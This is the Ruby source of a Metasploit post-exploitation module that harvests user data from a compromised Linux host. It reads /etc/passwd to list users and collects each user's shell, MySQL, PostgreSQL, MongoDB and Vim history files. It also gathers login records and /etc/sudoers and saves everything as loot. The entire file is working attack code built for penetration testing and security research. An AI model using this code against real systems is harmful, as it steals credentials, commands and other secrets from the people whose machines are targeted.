Path: blob/master/modules/post/linux/gather/enum_users_history.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::System89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Linux Gather User History',14'Description' => %q{15This module gathers the following user-specific information:16shell history, MySQL history, PostgreSQL history, MongoDB history,17Vim history, lastlog, and sudoers.18},19'License' => MSF_LICENSE,20'Author' => [21# based largely on get_bash_history function by Stephen Haywood22'ohdae <bindshell[at]live.com>'23],24'Platform' => ['linux'],25'SessionTypes' => ['shell', 'meterpreter'],26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [],29'Reliability' => []30}31)32)33end3435def run36distro = get_sysinfo3738print_good('Info:')39print_good("\t#{distro[:version]}")40print_good("\t#{distro[:kernel]}")4142user = execute('/usr/bin/whoami')43users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split44users = [user] if user != 'root' || users.blank?4546vprint_status("Retrieving history for #{users.length} users")47shells = %w[ash bash csh ksh sh tcsh zsh]48users.each do |u|49home = get_home_dir(u)50shells.each do |shell|51get_shell_history(u, home, shell)52end53get_mysql_history(u, home)54get_psql_history(u, home)55get_mongodb_history(u, home)56get_vim_history(u, home)57end5859last = execute('/usr/bin/last && /usr/bin/lastlog')60sudoers = cat_file('/etc/sudoers')61save('Last logs', last) unless last.blank?62save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/63end6465def save(msg, data, ctype = 'text/plain')66ltype = 'linux.enum.users'67loot = store_loot(ltype, ctype, session, data, nil, msg)68print_good("#{msg} stored in #{loot}")69end7071def execute(cmd)72vprint_status("Execute: #{cmd}")73output = cmd_exec(cmd)74output75end7677def cat_file(filename)78vprint_status("Download: #{filename}")79output = read_file(filename)80output81end8283def get_home_dir(user)84home = execute("echo ~#{user}")85if home.empty?86if user == 'root'87home = '/root'88else89home = "/home/#{user}"90end91end92home93end9495def get_shell_history(user, home, shell)96vprint_status("Extracting #{shell} history for #{user}")97hist = cat_file("#{home}/.#{shell}_history")98save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/99end100101def get_mysql_history(user, home)102vprint_status("Extracting MySQL history for #{user}")103sql_hist = cat_file("#{home}/.mysql_history")104save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/105end106107def get_psql_history(user, home)108vprint_status("Extracting PostgreSQL history for #{user}")109sql_hist = cat_file("#{home}/.psql_history")110save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/111end112113def get_mongodb_history(user, home)114vprint_status("Extracting MongoDB history for #{user}")115sql_hist = cat_file("#{home}/.dbshell")116save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/117end118119def get_vim_history(user, home)120vprint_status("Extracting Vim history for #{user}")121vim_hist = cat_file("#{home}/.viminfo")122save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/123end124end125126127